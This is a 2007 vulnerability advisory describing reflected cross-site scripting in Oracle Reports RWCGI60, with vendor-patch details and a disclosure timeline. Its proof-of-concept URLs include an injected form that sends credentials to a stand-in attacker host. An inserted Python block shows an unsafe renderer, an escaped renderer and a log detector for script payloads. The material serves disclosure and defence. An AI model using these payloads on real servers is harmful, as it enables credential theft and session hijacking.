oracle--isa-xss.txt

20 Jan 2007. Reported by Vicente Aguilera Diaz. Source: packetstorm (packetstormsecurity.com)

Oracle Reports Web Cartridge (RWCGI60) vulnerable to XSS. Improper validation allows injection of arbitrary code leading to session spoofing and credential theft

=============================================  
INTERNET SECURITY AUDITORS ALERT 2007-001  
- Original release date: January 17, 2007  
- Last revised: January 17, 2007  
- Discovered by: Vicente Aguilera Diaz  
- Severity: 3/5  
=============================================  
  
I. VULNERABILITY  
-------------------------  
Oracle Reports Web Cartridge (RWCGI60) vulnerable to XSS.  
  
II. BACKGROUND  
-------------------------  
The Reports Web CGI or Web Cartridge is required for the Reports  
Server when using the Oracle Application Server (OAS) to process  
report requests from Web clients.  
  
III. DESCRIPTION  
-------------------------  
Improper validation of the "genuser" parameter allows injection of  
arbitrary script/HTML code that is executed in the client browser.  
  
This is especially serious in authentication forms, where a malicious  
user can obtain the authentication credentials of other users.  
  
IV. PROOF OF CONCEPT  
-------------------------  
URL original:  
http://<oracle-server>/dev60cgi/rwcgi60?showmap&server=<oracle-reports-server>  
  
This request returns a page with an authentication form (with User  
Name, Password, and Database fields).  
  
With a POST method (rwcgi60 accepts both methods, GET and POST),  
the user sends:  
username=&password=&database=&authtype=D&genuser=&server=<oracle-reports-server>&nextpage=<next-page>  
  
A malicious user can modify the value of the "genuser" parameter and  
inject arbitrary script/HTML code:  
  
--- Example 1 ---  
http://<oracle-server>/dev60cgi/rwcgi60?showmap&server=<oracle-reports-server>&genuser=User  
Name<script>alert('Vulnerable to XSS attack!');</script>  
  
  
--- Example 2 ---  
http://<oracle-server>/dev60cgi/rwcgi60?showmap&server=<oracle-reports-server>&genuser=</form><form name='AttackerForm' action='http://attacker-machine.com/credentials'>User Name  
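
The reflection described above, modelled as an added example (not code from the advisory or from Oracle): a label renderer that echoes "genuser" verbatim beside one that HTML-encodes it, plus a detector that flags rwcgi60 requests in access-log lines whose "genuser" value carries markup. The form markup, the log lines and the `/rwcgi60` path check are assumptions for illustration.

```python
import html
import re
from typing import List, Optional
from urllib.parse import parse_qs, unquote, urlsplit

# Assumed model of the pre-patch page: genuser is echoed verbatim into the form.
def render_label_unsafe(genuser: str) -> str:
    return f"<label>{genuser}</label><input type='text' name='username'>"

# Mitigation: HTML-encode the untrusted value (quotes included) before it lands in markup.
def render_label_safe(genuser: str) -> str:
    return f"<label>{html.escape(genuser, quote=True)}</label><input type='text' name='username'>"

# Characters that can open a tag, break out of an attribute or start a URL handler.
MARKUP = re.compile(r"[<>\"']|javascript:", re.IGNORECASE)
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')

def suspicious_genuser(request_target: str) -> Optional[str]:
    """Return the decoded genuser value when it carries markup, else None."""
    parts = urlsplit(request_target)
    if not parts.path.endswith("/rwcgi60"):
        return None
    # parse_qs percent-decodes once; the extra unquote also catches values encoded twice.
    for value in parse_qs(parts.query, keep_blank_values=True).get("genuser", []):
        decoded = unquote(value)
        if MARKUP.search(decoded):
            return decoded
    return None

def flag_log_lines(lines: List[str]) -> List[str]:
    """Flagged genuser values from access-log lines. Only GET requests are visible
    here: POST bodies, which rwcgi60 also accepts, are not in a standard access log."""
    hits = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if match:
            found = suspicious_genuser(match.group(1))
            if found is not None:
                hits.append(found)
    return hits

# Constructed sample access-log lines (not taken from the advisory).
SAMPLE_LOG = [
    '192.0.2.10 - - [17/Jan/2007:10:00:01 +0100] "GET /dev60cgi/rwcgi60?showmap&server=rep1&genuser=User%20Name HTTP/1.1" 200 2048',
    '192.0.2.11 - - [17/Jan/2007:10:00:07 +0100] "GET /dev60cgi/rwcgi60?showmap&server=rep1&genuser=User%20Name%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 2100',
    '192.0.2.12 - - [17/Jan/2007:10:00:09 +0100] "GET /reports/index.html HTTP/1.1" 200 512',
]
```

The vendor patch is the actual fix; the encoded renderer shows the property a fixed page must have, and the log check is a way to spot probing of unpatched hosts.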
  
V. BUSINESS IMPACT  
-------------------------  
An attacker can spoof the session of other authenticated users,  
obtain their authentication credentials, or deface the authentication  
form page.  
  
VI. SYSTEMS AFFECTED  
-------------------------  
Oracle9i Application Server Release 2, version 9.0.2.3  
  
VII. SOLUTION  
-------------------------  
The January 2007 CPU (Critical Patch Update) contains fixes for this  
vulnerability.  
  
VIII. REFERENCES  
-------------------------  
- http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2007.html  
  
IX. CREDITS  
-------------------------  
This vulnerability has been discovered and reported by  
Vicente Aguilera Diaz (vaguilera (at) isecauditors (dot) com).  
  
X. REVISION HISTORY  
-------------------------  
January 17, 2007: Initial release  
  
XI. DISCLOSURE TIMELINE  
-------------------------  
April 23, 2006: Vulnerability acquired by Internet Security Auditors  
April 24, 2006: Initial vendor notification sent.  
April 29, 2006: Initial response of the vendor  
January 16, 2007: The vendor fixed the vulnerability in the CPU.  
  
XII. LEGAL NOTICES  
-------------------------  
The information contained within this advisory is supplied "as-is"  
with no warranties or guarantees of fitness of use or otherwise.  
Internet Security Auditors, S.L. accepts no responsibility for any  
damage caused by the use or misuse of this information.  
